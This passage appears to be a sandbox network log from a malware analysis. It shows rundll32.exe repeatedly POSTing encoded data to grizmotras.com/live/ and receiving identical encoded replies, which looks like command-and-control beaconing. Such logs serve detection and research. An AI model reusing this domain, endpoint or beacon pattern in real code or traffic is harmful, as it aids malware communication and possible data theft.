YjOeEyiMk3RpAMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:38 UTC	578	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpqg%2BbZenS50Tvj47umvTnCpe0MUMtD3s0sojWqonLYF8W63tjM98kf1tqf%2BNjoquGe%2FqZe9%2BqM57Y31u0UxNEVX737y6mDLmxoLEglB4HarF6IKeJtTOv0bfeur66CyQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99e1dacc6287a-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:38 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49788	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:39 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:39 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RpA8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:43 UTC	582	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wOxIAl7Gs7z1K4vU%2FPBwEPt8rAWn6GHAfn8lEdzHGrhYLrKJUH1QUYeBuhpi83G%2FjaKsxZzxEAihWsamFeeVjKPztCc2%2Fqa2MYKTol6%2BMfaWibR%2FiPfjJzb%2BZpoUGwo5JA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99e364d81a587-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:43 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49789	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:43 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:43 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RpAsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:48 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iq7vxx50mocme5DOoeaenQfqLwJbVFAt0gfpvn4imXpCg%2FMthlHUPU1uB%2Bgz3YGTRM3aswpb7vLVkP2SmS2dFylbrNXM9EtYRmsI1nmIrGvKGAopu7uoeK%2FyAFutGXCO4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99e536c34d9e1-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:48 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49790	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:48 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:48 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RpDcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:20:55 UTC	580	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:20:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EIqNwqx0pBkqdZa15U2LvZl%2FXexbjEfFFjd8oB52IfEPHNYcMqBxx7Yt0gWD31R6Kf%2BZnndDZsy6zuVyvqFF8v81Tz2FkwbTE%2BZb4iay%2F4zCx7f2tA0NczPb7RUtV%2Fte5w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99e6fbeae3361-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:20:55 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:20:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49791	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:20:56 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:20:56 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RpDMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:21:00 UTC	582	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:21:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2FcrrpAint%2Fg3pnTfTDhn64uoH6NzealqgMrh0U0Jphl3L49rGYypOSm7q97Q4AqoM1Oa0GVhpLFRd%2FSnAQXGp5gsn44Z%2BmOd0mfzf%2FQ%2Bs3qslOcOr715pP5UFVCDkmRnQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99ea1ea0c6dbb-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:21:00 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49792	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:01 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:01 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoBcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:21:04 UTC	574	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:21:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49nlVVLSfK2aOyC6dnql6sELXEHhvTrxLG4k148zyDzzdTl01GArUUkGzNLx5bGQPjKVO4OhPNxmeKRpye8vRBUKk44gL5IIhCm7AgOs%2FTSb5VgcAcxEaMRgWcCDfk%2BTZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99ec099fddacd-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:21:04 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49793	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:05 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:05 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoBMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:21:10 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:21:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iSPaDLoWaLUVgaqHNCYFVmRgmud7fDlX9pTNuaO6n7aiHv%2FIxDvPLNSgyIpckHv19YiNnlDKSQOPkIQEHefZsLZIsxP3k74%2Bmcz3NAFQZSyCLUU0t73hAc%2BfarupK3M67g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99ed8b8328dfd-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:21:10 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49794	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:10 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:10 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoB8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:21:15 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:21:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nq4JM2XH2Z3EdcnLREGJrjwpBXsFZVLGPiADWfbic21j499D0%2B8frY9ctN4W2aUbYajNrBwKY%2BRVAyzGl0z1Qb6opQDkU%2BIjYiMKa7xC1REqoqoJhNCKOtYAMHQy2IUP3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99ef9cff6a4ee-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:21:15 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49795	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:16 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:21:16 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RoBsnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:21:20 UTC	572	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:21:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8X8dy6gsFwgMNuvm82Fl2Vvik8a6cNplnBXpeJ8zGomMhs0WGIX37mt6pusfZhxte5bOBETywfRWHJDlAVjEFRA%2BmCjJdZFElIkhlwnVhhuSMhjnNxjexpnQbMN3DvLtg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a99f1ce856a4d0-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:21:20 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:21:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49796	172.67.219.28	443	7784	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:21:20 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
